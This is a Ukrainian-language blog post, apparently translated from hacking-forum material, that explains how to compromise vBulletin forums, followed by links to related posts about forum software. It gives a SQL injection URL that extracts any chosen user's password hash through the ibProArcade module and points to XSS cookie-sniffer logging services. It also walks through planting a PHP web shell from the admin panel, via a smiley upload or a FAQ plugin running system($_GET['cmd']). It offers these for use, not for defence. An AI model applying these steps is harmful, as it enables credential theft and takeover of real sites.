Feb
27
« Використання форуму на движку vBulletin | Продуктивність і оптимізація скрипта vBulletin FAQ »
www.xz.сom/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
Де [any_user] id потрібного нам юзера.
При використанні XSS з вказаним в темі сніфером. Балки дивитися тут: http://antichat.ru/sniff/log.php
Але краще завести собі свій сніфер -). Це можна зробити тут: http://antichat.ru/sniffer або тут: http://s.netsec.ru.
Шелл в vBulletin.
Розберемося як залити шелл з адмінки вобли.
Спосіб заливки шелла в vBulletin 2.*.* і 3.0.*
1. Заходимо в адмінку.
2. Смайли.
3. Завантажити смайл.
4. Вантажимо наш шелл. (тека за умовчанням /images/smilies)
5. Заходимо www.xz.сom/forumpath/images/smilies/shell.php
Примітка: спрацює не скрізь.
Спосіб заливки шелла в vBulletin 3.5.*.
VBulletin - Огляд уязвімостей vBulletin alive.in.ua
1. Заходимо в адмінку.
2. Система модулів.
3. Додати новий модуль.
Продукт: ставимо vBulletin
Місцерозташування: Vbulletin: Довідка - faq_complete
Вставляємо в тіло код нашого шелла (шелл не повинен перевищувати 60кб), простіше зробити system($_GET["cmd"]);
4. Зберігаємо, йдемо в faq (довідка), все тепер у нас є шелл. Якщо він був такий system($_GET["cmd"]); робимо так www.xz.сom/forumpath/faq.php?cmd=тут команда
Відео по темі:
http://video.antichat.ru/file105.html
http://video.antichat.ru/file95.html
http://video.antichat.ru/file57.html
http://video.antichat.ru/file3.html
З.Ы. Сильно не лаятися. Якщо десь був не прав, виправляємо, якщо щось упустив, додаємо… Не став вилажівать деякі XSS оскільки версія форуму у них повторюється…
Tags: дані, код, користувач, опис, приклад, сценарій, уразливість
VBulletin
Схожі записи
- Система репутації у форумах phpBB (26.03.2009)... m157y - один з кращих спеців по phpBB в Росії. Не зовсім в курсі, що у нього з phpBB Guru відбулося, але звідти він пішов. Практично відразу з початком роботи над ще бета-версией phpBB 3, він приступив до створення мега-мода репутації, який би включав майже весь функціонал, який ...
- Установка форуму phpBB з нуля (24.03.2009)... Приступимо до установки. Створення аккаунта на хостингу Заходимо на сайт хостингу - Holm.Ru, і вибираємо «Створити сайт російською мовою» (якщо плануєте сайт на англійському, то відповідно вибираєте «Створити сайт англійською мовою») Заповнюємо всі необхідні поля і чекаємо коли ж прийде лист на майл. Ну ...
- phpBB - огляд форумного движка (22.03.2009)... Він дуже популярний у всьому світі і має відкритий код, що робить його привабливим для сторонніх розробників, які створюють масу модов. Можливості phpBB Масове переміщення, видалення, і закриття тим; Розділення тим; Можливість автоматичного чищення старих повідомлень; Швидка конфігурація форуму; ...
- vBulletin скорочено vB (24.02.2009)
... У лютому 2000 року вони вирішили, що було б непогано написати свій веб-форум, бо вони були незнайомі з кодом даного програмного забезпечення і не змогли б оптимізувати його. Спочатку це було задумано всього лише як переписування UBB, але на PHP і використовуючи MYSQL, і призначалося тільки для їх форуму. Проте, через декілька місяців, інші володарі UBB ... - IPB 3 Роблячи шаблони простіше (09.03.2009)
... У попередній версії для створення подібного "вигляду" об'єднувалося декілька шаблонів (до 30!). Це означало, що деякі елементи інтерфейсу були жорстко закріплені за певною позицією і не могли бути перенесені в інше місце сторінки. Наприклад, на головній сторінці не було можливості перенести статистику вище за список форумів. Аналогічним чином було неможливо перенести активних користувачів нижче за ...